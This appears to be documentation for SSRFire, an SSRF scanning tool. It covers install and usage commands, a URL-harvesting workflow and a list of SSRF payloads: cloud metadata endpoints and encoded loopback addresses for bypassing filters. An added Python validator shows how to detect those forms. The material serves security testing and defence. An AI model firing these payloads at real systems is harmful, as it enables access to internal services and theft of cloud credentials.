Description
SSRFire automates SSRF (Server-Side Request Forgery) discovery. It takes a list of URLs, injects SSRF payloads into their parameters, and monitors an out-of-band callback endpoint for hits. It also checks for open redirects and XSS as bonus findings.
Installation
BASH
git clone https://github.com/micha3lb3n/SSRFire.git
cd SSRFire
chmod +x ssrfire.sh
Basic Usage
BASH
# Run against target domain
./ssrfire.sh -d target.com -s your-collaborator-url
# With URL list
./ssrfire.sh -l urls.txt -s your-collaborator-url
Advanced Usage
BASH
# Custom headers
./ssrfire.sh -d target.com -s your-collaborator-url -H "Cookie: session=abc"
# Custom threads
./ssrfire.sh -l urls.txt -s your-collaborator-url -t 20
Common SSRF Payloads
TEXT
# Internal network access
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/ (AWS metadata)
http://metadata.google.internal/ (GCP metadata)
# Bypass filters
http://0x7f000001 (hex IP)
http://2130706433 (decimal IP)
http://0177.0.0.1 (octal IP)
http://127.1 (short form)
http://[::1] (IPv6 localhost)
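The filter-bypass forms above work because naive blocklists compare strings like "127.0.0.1" or "localhost" instead of the address a URL actually resolves to. The following is an added defender-side example, not part of SSRFire: it canonicalises hex, decimal, octal, short-form and IPv6 hosts the way inet_aton() does and then asks whether the result is non-global (loopback, link-local metadata, private space). The function names, the `BLOCKED_HOSTNAMES` set and the test URLs are constructed for this example.

```python
import ipaddress
from urllib.parse import urlsplit

# Internal hostnames from the payload list above; constructed for this example.
BLOCKED_HOSTNAMES = {"localhost", "metadata.google.internal"}


def parse_legacy_ipv4(host: str):
    """Parse IPv4 like inet_aton(): 1 to 4 dot-separated parts, each decimal,
    octal (leading 0) or hex (0x); the last part fills the remaining bytes,
    so 127.1 == 127.0.0.1. Returns an IPv4Address or None if not numeric."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    vals = []
    for p in parts:
        if not p.isalnum():           # rejects '', '-1', '1_0' and similar
            return None
        try:
            if p.lower().startswith("0x"):
                vals.append(int(p[2:], 16))
            elif len(p) > 1 and p.startswith("0"):
                vals.append(int(p, 8))
            else:
                vals.append(int(p, 10))
        except ValueError:
            return None
    *lead, last = vals
    tail_bits = 8 * (5 - len(vals))   # bytes covered by the last part
    if any(v > 255 for v in lead) or last >= 1 << tail_bits:
        return None
    n = 0
    for v in lead:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << tail_bits) | last)


def canonical_target(url: str):
    """Return (hostname, IP address or None) with the encoding tricks undone."""
    host = (urlsplit(url).hostname or "").lower()   # strips [] from IPv6 literals
    ip = parse_legacy_ipv4(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)          # plain dotted quads and IPv6
        except ValueError:
            ip = None
    return host, ip


def is_ssrf_risk(url: str) -> bool:
    """True if the URL targets a known internal hostname or a non-global address."""
    host, ip = canonical_target(url)
    if host in BLOCKED_HOSTNAMES:
        return True
    if ip is None:
        return False   # unresolved name: resolve it and re-check before fetching
    if ip.version == 6 and ip.ipv4_mapped:           # ::ffff:127.0.0.1
        ip = ip.ipv4_mapped
    return not ip.is_global
```

A hostname that is not numeric still needs DNS resolution and the same check on every resolved address (and again at connect time) to cover DNS-rebinding and redirect chains.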
Common Workflows
BASH
# Collect parameterized URLs → test for SSRF
gau target.com | grep -iE "url=|dest=|redirect=|uri=|path=|src=|domain=|site=" | sort -u > ssrf_candidates.txt
./ssrfire.sh -l ssrf_candidates.txt -s your-callback.oast.fun